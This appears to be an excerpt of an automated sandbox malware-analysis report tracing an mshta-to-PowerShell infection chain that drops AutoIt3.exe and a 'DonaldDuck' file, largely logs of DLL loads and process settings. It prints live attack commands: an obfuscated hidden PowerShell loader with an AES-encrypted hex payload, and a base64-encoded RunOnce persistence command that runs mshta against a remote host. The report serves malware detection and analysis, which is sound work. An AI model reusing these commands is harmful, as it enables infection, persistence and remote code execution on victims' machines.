      Source: C:\Windows\System32\mshta.exe  Section loaded: msasn1.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: cryptsp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: rsaenh.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: cryptbase.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: gpapi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: imgutil.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: msimtf.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: textinputframework.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: ntmarta.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dataexchange.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: d3d11.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dcomp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dxgi.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: d2d1.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dwrite.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: d3d10warp.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: dxcore.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: jscript9.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: scrrun.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: sxs.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: propsys.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: edputil.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: appresolver.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: slc.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: sppc.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\mshta.exe  Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe  Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\mshta.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
      Source: Window Recorder  Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211852416.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2195911293.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 
0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2187081636.000001CAD6447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
      Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 
0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr

      Data Obfuscation

      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657
C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: DonaldDuck[1].3.drStatic PE information: 0x91B0268B [Sat Jun 15 19:42:03 2047 UTC]
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0018310D
      Source: DonaldDuck[1].3.drStatic PE information: real checksum: 0xb728 should be: 0x33546
      Source: DonaldDuck[1].3.drStatic PE information: section name: .didat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B1B1027 push ebp; ret 7_2_00007FFD9B1B1028
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B277733 push 3B485B53h; ret 7_2_00007FFD9B277738
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B27597B push esp; retf 7_2_00007FFD9B2759D9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00191046 push ecx; ret 15_2_00191059
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE171 push 015DE19Dh; ret 15_2_015DE195
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2107 push 015D2555h; ret 15_2_015D254D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE101 push 015DE12Dh; ret 15_2_015DE125
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE139 push 015DE165h; ret 15_2_015DE15D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE1E1 push 015DE20Dh; ret 15_2_015DE205
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE1A9 push 015DE1D5h; ret 15_2_015DE1CD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E0369 push 015E0395h; ret 15_2_015E038D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D23D9 push 015D2555h; ret 15_2_015D254D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE251 push 015DE29Dh; ret 15_2_015DE295
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE271 push 015DE29Dh; ret 15_2_015DE295
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE219 push 015DE245h; ret 15_2_015DE23D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CC205 push 015CC231h; ret 15_2_015CC229
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2559 push 015D25C8h; ret 15_2_015D25C0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2557 push 015D25C8h; ret 15_2_015D25C0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DA519 push ecx; mov dword ptr [esp], ecx15_2_015DA51E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D25D9 push 015D2605h; ret 15_2_015D25FD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D25D1 push 015D2605h; ret 15_2_015D25FD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E25F5 push 015E2621h; ret 15_2_015E2619
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E25BD push 015E25E9h; ret 15_2_015E25E1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D8719 push 015D87C1h; ret 15_2_015D87B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D87C3 push 015D8859h; ret 15_2_015D8851
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2635 push 015E2661h; ret 15_2_015E2659
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2633 push 015E2661h; ret 15_2_015E2659
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D86A1 push 015D8717h; ret 15_2_015D870F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D8949 push 015D8975h; ret 15_2_015D896D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D891C push 015D8975h; ret 15_2_015D896D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E291D push 015E2949h; ret 15_2_015E2941
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AutoIt3.exe
      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]

      Boot Survival

      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncher
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncher pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00202558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_00202558
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00185D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00185D03
      Source: C:\Windows\regedit.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
